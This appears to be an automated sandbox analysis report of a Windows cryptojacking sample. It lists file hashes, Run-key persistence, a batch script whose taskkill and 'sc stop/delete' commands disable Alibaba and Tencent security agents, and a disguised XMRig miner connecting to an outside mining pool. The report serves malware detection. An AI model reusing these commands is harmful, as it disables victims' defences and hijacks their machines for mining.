Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-05-2021 15:01
Static task
static1
Behavioral task
behavioral1
Sample
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Resource
win10v20210408
General
-
Target
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
-
Size
569KB
-
MD5
c85e27470e88ad0d0449ab68ef18d0a3
-
SHA1
4791330c3acf353772c3d073cc52a619eb4cd7cc
-
SHA256
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
-
SHA512
39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Malware Config
Signatures
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3976-146-0x00007FF692DA0000-0x00007FF693D0A000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
htttp.exeredis-server.exepid process 824 htttp.exe 3976 redis-server.exe -
Stops running service(s) 3 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
htttp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" htttp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" htttp.exe -
Drops file in Windows directory 2 IoCs
Processes:
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exedescription ioc process File created C:\Windows\htttp.exe 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe File opened for modification C:\Windows\htttp.exe 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 516 tasklist.exe 3772 tasklist.exe 2180 tasklist.exe 1016 tasklist.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2588 taskkill.exe 1116 taskkill.exe 3396 taskkill.exe 3924 taskkill.exe 3452 taskkill.exe 1832 taskkill.exe 3052 taskkill.exe 3128 taskkill.exe 420 taskkill.exe 3256 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeredis-server.exedescription pid process Token: SeDebugPrivilege 3772 tasklist.exe Token: SeDebugPrivilege 2180 tasklist.exe Token: SeDebugPrivilege 1016 tasklist.exe Token: SeDebugPrivilege 516 tasklist.exe Token: SeDebugPrivilege 3128 taskkill.exe Token: SeDebugPrivilege 3924 taskkill.exe Token: SeDebugPrivilege 3452 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 2588 taskkill.exe Token: SeDebugPrivilege 420 taskkill.exe Token: SeDebugPrivilege 3256 taskkill.exe Token: SeDebugPrivilege 1116 taskkill.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 3396 taskkill.exe Token: SeLockMemoryPrivilege 3976 redis-server.exe Token: SeLockMemoryPrivilege 3976 redis-server.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exehtttp.execmd.exedescription pid process target process PID 736 wrote to memory of 824 736 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 736 wrote to memory of 824 736 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 736 wrote to memory of 824 736 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe PID 824 wrote to memory of 3276 824 htttp.exe cmd.exe PID 824 wrote to memory of 3276 824 htttp.exe cmd.exe PID 824 wrote to memory of 3276 824 htttp.exe cmd.exe PID 3276 wrote to memory of 3772 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 3772 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 3772 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 2180 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 2180 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 2180 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 1016 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 1016 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 1016 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 516 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 516 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 516 3276 cmd.exe tasklist.exe PID 3276 wrote to memory of 3128 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3128 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3128 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3924 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3924 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3924 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3452 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3452 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 3452 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 1832 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 1832 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 1832 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 2588 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 2588 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 2588 3276 cmd.exe taskkill.exe PID 3276 wrote to memory of 736 3276 cmd.exe sc.exe PID 3276 wrote to memory of 736 3276 cmd.exe sc.exe PID 3276 wrote to memory of 736 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2732 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2732 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2732 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2204 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2204 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2204 3276 cmd.exe sc.exe PID 3276 wrote to memory of 3828 3276 cmd.exe sc.exe PID 3276 wrote to memory of 3828 3276 cmd.exe sc.exe PID 3276 wrote to memory of 3828 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1688 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1688 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1688 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1228 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1228 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1228 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2128 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2128 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2128 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2304 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2304 3276 cmd.exe sc.exe PID 3276 wrote to memory of 2304 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1828 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1828 3276 cmd.exe sc.exe PID 3276 wrote to memory of 1828 3276 cmd.exe sc.exe PID 3276 wrote to memory of 500 3276 cmd.exe sc.exe PID 3276 wrote to memory of 500 3276 cmd.exe sc.exe PID 3276 wrote to memory of 500 3276 cmd.exe sc.exe PID 3276 wrote to memory of 420 3276 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\htttp.exe"C:\Windows\htttp.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq Ali_update.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_assist_service.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_assist_update.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI " IMAGENAME eq aliyun_installer.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_assist_service.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_assist_update.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aliyun_installer.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Ali_update.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AliHids.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc stop "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "BaradAgentSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "StargateSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc stop "QPCore"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "BaradAgentSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "StargateSvc"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "QPCore"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QQProtect.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sgagent.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BaradAgent.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YDLive.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YDService.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exe"C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
C:\Users\Admin\AppData\Local\Temp\redis-server.exeMD5
0c4ae60bb07bd7c084ca66b844fa0b4b
SHA1ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
SHA25631cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
SHA5125dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
-
C:\Users\Admin\AppData\Local\Temp\run.batMD5
f1cc668d01eeb779b1fc1044541fc1d4
SHA145bd782881b31eb2868fc211b19af2cb627a9d0d
SHA25662fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
SHA512293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e
-
C:\Windows\htttp.exeMD5
c85e27470e88ad0d0449ab68ef18d0a3
SHA14791330c3acf353772c3d073cc52a619eb4cd7cc
SHA25670f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA51239bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
-
C:\Windows\htttp.exeMD5
c85e27470e88ad0d0449ab68ef18d0a3
SHA14791330c3acf353772c3d073cc52a619eb4cd7cc
SHA25670f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA51239bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
-
memory/420-138-0x0000000000000000-mapping.dmp
-
memory/500-137-0x0000000000000000-mapping.dmp
-
memory/516-122-0x0000000000000000-mapping.dmp
-
memory/736-128-0x0000000000000000-mapping.dmp
-
memory/824-114-0x0000000000000000-mapping.dmp
-
memory/1016-121-0x0000000000000000-mapping.dmp
-
memory/1116-140-0x0000000000000000-mapping.dmp
-
memory/1228-133-0x0000000000000000-mapping.dmp
-
memory/1688-132-0x0000000000000000-mapping.dmp
-
memory/1828-136-0x0000000000000000-mapping.dmp
-
memory/1832-126-0x0000000000000000-mapping.dmp
-
memory/2128-134-0x0000000000000000-mapping.dmp
-
memory/2180-120-0x0000000000000000-mapping.dmp
-
memory/2204-130-0x0000000000000000-mapping.dmp
-
memory/2304-135-0x0000000000000000-mapping.dmp
-
memory/2588-127-0x0000000000000000-mapping.dmp
-
memory/2732-129-0x0000000000000000-mapping.dmp
-
memory/3052-141-0x0000000000000000-mapping.dmp
-
memory/3128-123-0x0000000000000000-mapping.dmp
-
memory/3256-139-0x0000000000000000-mapping.dmp
-
memory/3276-117-0x0000000000000000-mapping.dmp
-
memory/3396-142-0x0000000000000000-mapping.dmp
-
memory/3452-125-0x0000000000000000-mapping.dmp
-
memory/3772-119-0x0000000000000000-mapping.dmp
-
memory/3828-131-0x0000000000000000-mapping.dmp
-
memory/3924-124-0x0000000000000000-mapping.dmp
-
memory/3976-143-0x0000000000000000-mapping.dmp
-
memory/3976-146-0x00007FF692DA0000-0x00007FF693D0A000-memory.dmpFilesize
15.4MB
-
memory/3976-147-0x0000026DE0D50000-0x0000026DE0D70000-memory.dmpFilesize
128KB
-
memory/3976-148-0x0000026DE0D80000-0x0000026DE0DA0000-memory.dmpFilesize
128KB
-
memory/3976-149-0x0000026DE2820000-0x0000026DE2840000-memory.dmpFilesize
128KB
-
memory/3976-150-0x0000026DE2840000-0x0000026DE2860000-memory.dmpFilesize
128KB